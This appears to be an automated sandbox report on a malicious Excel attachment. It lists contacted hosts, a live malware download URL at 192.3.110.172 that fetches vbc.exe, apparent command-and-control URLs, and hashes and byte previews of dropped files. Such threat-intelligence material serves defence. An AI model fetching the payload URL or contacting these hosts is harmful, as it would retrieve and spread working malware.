
      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.mozilla.com00%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://www.washingtonboatrentals.com/mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ==0%Avira URL Cloudsafe
      http://java.sun.com0%VirustotalBrowse
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      www.naplesconciergerealty.com/mxnu/7%VirustotalBrowse
      www.naplesconciergerealty.com/mxnu/100%Avira URL Cloudmalware
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://192.3.110.172/000900/vbc.exe100%Avira URL Cloudmalware
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.washingtonboatrentals.com
      		3.64.163.50
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://www.washingtonboatrentals.com/mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ==true
        • Avira URL Cloud: safe
        		unknown
        www.naplesconciergerealty.com/mxnu/true
        • 7%, Virustotal, Browse
        • Avira URL Cloud: malware
        		low
        http://192.3.110.172/000900/vbc.exetrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpfalse
          		high
          http://investor.msn.comexplorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpfalse
            		high
            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpfalse
              		high
              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.mozilla.com0explorer.exe, 00000006.00000000.514857516.0000000008118000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmpfalse
                		high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://treyresearch.netexplorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpfalse
                    		high
                    http://java.sun.comexplorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.piriform.com/cexplorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmpfalse
                          		high
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmpfalse
                            		high
                            http://investor.msn.com/explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmpfalse
                                		high
                                http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://www.%s.comPAvbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpfalse
                                  		high
                                  https://support.mozilla.orgexplorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmpfalse
                                      		high
                                      http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.510963296.0000000003E50000.00000002.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      3.64.163.50
                                      		www.washingtonboatrentals.comUnited States
                                      		16509AMAZON-02UStrue
                                      192.3.110.172
                                      		unknownUnited States
                                      		36352AS-COLOCROSSINGUStrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:502271
                                      Start date:13.10.2021
                                      Start time:19:01:48
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 27s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Sajeeb09908976745344567.xlsx
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLSX@9/15@2/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 18.3% (good quality ratio 17.4%)
                                      • Quality average: 77.5%
                                      • Quality standard deviation: 27.9%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 88
                                      • Number of non-executed functions: 81
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .xlsx
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                      • Not all processes where analyzed, report is missing behavior information

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      19:02:52API Interceptor83x Sleep call for process: EQNEDT32.EXE modified
                                      19:03:00API Interceptor60x Sleep call for process: vbc.exe modified
                                      19:03:29API Interceptor229x Sleep call for process: netsh.exe modified
                                      19:04:15API Interceptor1x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      3.64.163.50pago atrasado.exeGet hashmaliciousBrowse
                                      • www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo
                                      dtMT5xGa54.exeGet hashmaliciousBrowse
                                      • www.washingtonboatrentals.com/mxnu/?7nq=5sVEEjOmrIjyiN9vCkM9c91RRKirbtM3qC1GzUYSEv1utDuAcK9IK8i2a3TROe3U0hoE&nZkd=5jux_PXX
                                      Sauermann New Order.exeGet hashmaliciousBrowse
                                      • www.austindemolitioncontractor.com/b5ce/?6lXX=bq879k6PIBz+oRBHyJuPsdt6y2gkPqxT6d7DjVxQu7/X3zEo7DCM784DGAuEKxrnN+bH&Ytx=2dN4
                                      DHL Shipment Notification 74683783.exeGet hashmaliciousBrowse
                                      • www.laced.xyz/i6rd/?Y8=1bxX_L&k48hR8=bU44cI6fE0o4iZpo6i4S2m/nC9aLfjgVnfDy0K3sTdjFHTQB5cWrVvnhM2X89lB4R8AN
                                      549TXoJm6p.exeGet hashmaliciousBrowse
                                      • www.washingtonboatrentals.com/mxnu/?7nIdZB8X=5sVEEjOmrIjyiN9vCkM9c91RRKirbtM3qC1GzUYSEv1utDuAcK9IK8i2a0zrePXsuGJD&F0Gd=FTtl
                                      bGOw6FuOUA.exeGet hashmaliciousBrowse
                                      • www.oklahomaexcavation.com/tumb/?9r5T0HU8=4zPt7kWXGWh8HwUtv3PPZv5m2ZyxYLCi6mZUOZySZKAhwaBoSeDisr+J5xLeKjwvLd91&n0D=drcP0F7Pi
                                      FedEx_AWB#_224174658447.exeGet hashmaliciousBrowse
                                      • www.theexecutivefidgetset.com/c6bi/?B6Aljdbx=RXkkfcjOLYbVurqjx6Do7wX6XiONuzHvFSVLSigBzh6JR7xwn6Utb+JN3RYER/bqPk+5&FDHH=1bcdAJbhe
                                      Inquiry Urgent Grupo Dani Chile.exeGet hashmaliciousBrowse
                                      • www.austindemolitioncontractor.com/b5ce/?_H=bq879k6PIBz+oRBHyJuPsdt6y2gkPqxT6d7DjVxQu7/X3zEo7DCM784DGDC+JwHcOJ6WTAkuuQ==&1bHXKB=MPLdBHEh52ZHYR
                                      Angebotsanfrage 86548.exeGet hashmaliciousBrowse
                                      • www.atomizer.xyz/ou3t/?gFN4gfKP=qCel+gZZ+aBIYanTm7BoA5PU6r5HF03c6K+zh0Ia/cWjKu1aViUN5EQRe83WYvNeEkRU&3ff87=TXX86TTxSb7xn
                                      Cost Inquiry.exeGet hashmaliciousBrowse
                                      • www.villamante.com/b5ce/?mXeTaX=Jbmx24p0ClFL&J2M=7yv+sRlAJqST60jDhfTKkVYz9ALetPX59nt/q3NTarObbD6Qp3RvHJttKj33GsqHaGK/
                                      Mikbin.exeGet hashmaliciousBrowse
                                      • www.stockgorithm.com/da5x/?QpEpWh68=J+cZRauKlV/tggET7eClJZXSWMQFV+UNHr5fuOU02VP1OAVrGtEHn2Eq0bHkvDt33Ysy&x6kH=Xl_h-TZ09

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      www.washingtonboatrentals.comdtMT5xGa54.exeGet hashmaliciousBrowse
                                      • 3.64.163.50
                                      549TXoJm6p.exeGet hashmaliciousBrowse
                                      • 3.64.163.50

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      AS-COLOCROSSINGUSPaymentslip 10132021.xlsxGet hashmaliciousBrowse
                                      • 192.3.13.95
                                      Swift.xlsxGet hashmaliciousBrowse
                                      • 192.3.222.155
                                      ojZRw3eBpNGet hashmaliciousBrowse
                                      • 107.172.24.165
                                      yEumlkJuVEGet hashmaliciousBrowse
                                      • 107.173.176.7
                                      DHL consignment number_600595460.xlsxGet hashmaliciousBrowse
                                      • 198.12.84.79
                                      4f0PBbcOBIGet hashmaliciousBrowse
                                      • 107.173.176.7
                                      IdXkXl1i9rGet hashmaliciousBrowse
                                      • 107.173.176.7
                                      RlypFfB7n8Get hashmaliciousBrowse
                                      • 107.173.176.7
                                      7iw4z5I41wGet hashmaliciousBrowse
                                      • 107.173.176.7
                                      6wfKGbEfZNGet hashmaliciousBrowse
                                      • 107.173.176.7
                                      Invoice_Charge.xlsxGet hashmaliciousBrowse
                                      • 192.227.158.101
                                      090900 Quotation - Urgent.xlsxGet hashmaliciousBrowse
                                      • 107.172.13.131
                                      Contract.xlsxGet hashmaliciousBrowse
                                      • 192.3.122.140
                                      REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                      • 23.94.159.208
                                      PO08485.xlsxGet hashmaliciousBrowse
                                      • 107.172.13.137
                                      lod1.xlsxGet hashmaliciousBrowse
                                      • 192.3.122.140
                                      Invoice Charge.xlsxGet hashmaliciousBrowse
                                      • 192.227.158.101
                                      TransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                      • 192.3.110.172
                                      Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                      • 192.3.13.95
                                      Payment_List.xlsxGet hashmaliciousBrowse
                                      • 107.172.73.191
                                      AMAZON-02US2OfuyvjJu1.msiGet hashmaliciousBrowse
                                      • 52.95.163.44
                                      cvWFjfKtdHGet hashmaliciousBrowse
                                      • 54.103.213.234
                                      K3h3TPEpzeGet hashmaliciousBrowse
                                      • 34.219.214.170
                                      Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                      • 54.230.206.106
                                      Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                      • 54.230.206.106
                                      Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                      • 54.230.206.51
                                      Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                      • 54.230.206.25
                                      Ref 0180066743.xlsxGet hashmaliciousBrowse
                                      • 13.232.45.220
                                      pago atrasado.exeGet hashmaliciousBrowse
                                      • 3.64.163.50
                                      6AYs2EgVeN.apkGet hashmaliciousBrowse
                                      • 52.222.174.50
                                      4f0PBbcOBIGet hashmaliciousBrowse
                                      • 34.249.145.219
                                      REQUIREMENT.exeGet hashmaliciousBrowse
                                      • 3.121.211.190
                                      RlypFfB7n8Get hashmaliciousBrowse
                                      • 54.171.230.55
                                      7iw4z5I41wGet hashmaliciousBrowse
                                      • 34.249.145.219
                                      SecuriteInfo.com.Trojan.Linux.Generic.191302.28689.5288Get hashmaliciousBrowse
                                      • 54.171.230.55
                                      ldJp8ogMLq.apkGet hashmaliciousBrowse
                                      • 35.162.9.128
                                      ldJp8ogMLq.apkGet hashmaliciousBrowse
                                      • 44.235.227.57
                                      SecuriteInfo.com.Linux.BtcMine.470.15094.2496Get hashmaliciousBrowse
                                      • 108.157.2.216
                                      lpa-park.apkGet hashmaliciousBrowse
                                      • 54.229.52.247
                                      acciona-mobility-1-21-1.apkGet hashmaliciousBrowse
                                      • 143.204.225.4

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeTransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                        C:\Users\Public\vbc.exeTransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                          C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dlldtMT5xGa54.exeGet hashmaliciousBrowse
                                            TransportLabel_1189160070.xlsxGet hashmaliciousBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:downloaded
                                              Size (bytes):290617
                                              Entropy (8bit):7.9395134807721
                                              Encrypted:false
                                              SSDEEP:6144:wBlL/c7HU+ICkZsFE03JDT37iHxU1D/RmNOZeXBiFkJTstHJXd0mU:Ce7HUDCysO0dLiWDc8ZHKmHImU
                                              MD5:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              SHA1:BE50CDBB0AF4C77229E3DE0EC7F34088AAE64DC2
                                              SHA-256:2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
                                              SHA-512:EED60BDA2D0A5FB02F823DB8CAF57D136DC6D003F49CA7D3CB6A620DCB1CF4AD4E52C6B9A40AEFE9126F9E137776AE23D78A2648F5609FA3D69989AB3D185CC2
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              Joe Sandbox View:
                                              • Filename: TransportLabel_1189160070.xlsx, Detection: malicious, Browse
                                              Reputation:low
                                              IE Cache URL:http://192.3.110.172/000900/vbc.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F69C161.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AB87D1A.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869DD99B.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):68702
                                              Entropy (8bit):7.960564589117156
                                              Encrypted:false
                                              SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                              MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                              SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                              SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                              SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                              Malicious:false
                                              Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE477EE.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):83904
                                              Entropy (8bit):7.986000888791215
                                              Encrypted:false
                                              SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                              MD5:9F9A7311810407794A153B7C74AED720
                                              SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                              SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                              SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                              Malicious:false
                                              Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):498420
                                              Entropy (8bit):0.6411295525044179
                                              Encrypted:false
                                              SSDEEP:384:kXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:WXwBkNWZ3cjvmWa+VDO
                                              MD5:E13FB0CF12ACB0DE77343AA8E634CE46
                                              SHA1:D34081BD6861817968A03A3EAB06B3779B5F4289
                                              SHA-256:8A8CA6BB15367EFC9FD076DFB139ADAC8C250E7019AED4DF21B823C827B82D50
                                              SHA-512:95094ED249C649C4D4679E27345EA0FA5934C1D64E641FCDD22A611753052AB8B5BA674CB41DEA6A3D80DCB0118B610EA83109800122FCCF57EF652C6C6E8219
                                              Malicious:false
                                              Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................NZ$...../..fXZ.@-.%...../. ./......./.../.RQ.[../.|./......./.h./.$Q.[../.|./. ...IdXZ|./.../. ............dXZ............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...|./.../..8PZ........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2A0EB17.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10202
                                              Entropy (8bit):7.870143202588524
                                              Encrypted:false
                                              SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                              MD5:66EF10508ED9AE9871D59F267FBE15AA
                                              SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                              SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                              SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                              Malicious:false
                                              Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED8DC3D.png
